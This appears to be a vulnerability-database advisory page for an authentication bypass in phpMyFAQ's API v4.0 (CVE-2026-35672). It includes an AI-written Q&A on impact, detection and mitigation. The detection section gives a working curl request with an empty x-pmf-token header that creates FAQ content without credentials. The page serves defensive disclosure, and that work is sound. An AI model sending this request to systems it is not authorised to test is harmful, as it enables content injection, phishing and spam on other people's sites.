CVE-2026-35672
Received Received - Intake
Authentication Bypass in phpMyFAQ API v4.0

Publication date: 2026-05-28

Last updated on: 2026-05-28

Assigner: VulnCheck

Description
phpMyFAQ before 4.1.3 contains an authentication bypass vulnerability in API v4.0 where the default empty api.apiClientToken allows unauthenticated users to create and modify FAQ entries. Attackers can send an empty x-pmf-token header to bypass token validation and inject malicious content via POST endpoints /api/v4.0/faq/create, /api/v4.0/category, and /api/v4.0/question.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-05-28
Last Modified
2026-05-28
Generated
2026-05-28
AI Q&A
2026-05-28
EPSS Evaluated
N/A
NVD
CVE-2026-35672
EUVD
EUVD-2026-32903
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
phpmyfaq phpmyfaq to 4.1.3 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-1188 The product initializes or sets a resource with a default that is intended to be changed by the product's installer, administrator, or maintainer, but the default is not secure.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-35672 is an authentication bypass vulnerability in phpMyFAQ versions before 4.1.3. The issue occurs because the default configuration sets an empty API client token, which allows unauthenticated users to bypass token validation by sending an empty x-pmf-token header.

This flaw exists due to a faulty comparison in the hasValidToken() method, which incorrectly treats an empty token as valid when no token is configured. As a result, attackers can create, modify, or delete FAQ entries, categories, and questions through the REST API without any credentials.


How can this vulnerability impact me? :

Exploitation of this vulnerability allows attackers to inject malicious content into the FAQ system by creating or modifying entries, categories, and questions without authentication.

  • Content injection
  • Phishing attacks
  • SEO spam
  • Damage to the reputation of the affected site or organization

How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by checking if your phpMyFAQ installation is running a version before 4.1.3 and if the API client token is set to an empty value. Specifically, you can test if sending an empty x-pmf-token header to the REST API endpoints allows unauthorized access.

A practical detection method is to send HTTP POST requests to the vulnerable API endpoints such as /api/v4.0/faq/create, /api/v4.0/category, or /api/v4.0/question with an empty x-pmf-token header and observe if the request is accepted without authentication.

  • Use curl to test the authentication bypass, for example:
  • curl -X POST https://your-phpmyfaq-domain/api/v4.0/faq/create -H "x-pmf-token:" -d '{"question":"test","answer":"test"}' -v
  • If the server accepts this request and creates or modifies content without requiring a valid token, the vulnerability is present.

What immediate steps should I take to mitigate this vulnerability?

The immediate mitigation step is to upgrade phpMyFAQ to version 4.1.3 or later, where this authentication bypass vulnerability has been patched.

If upgrading immediately is not possible, manually set a non-empty api.apiClientToken value in the configuration to prevent the empty token from being accepted.

Additionally, restrict access to the API endpoints by network controls or firewall rules to limit exposure until the patch is applied.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart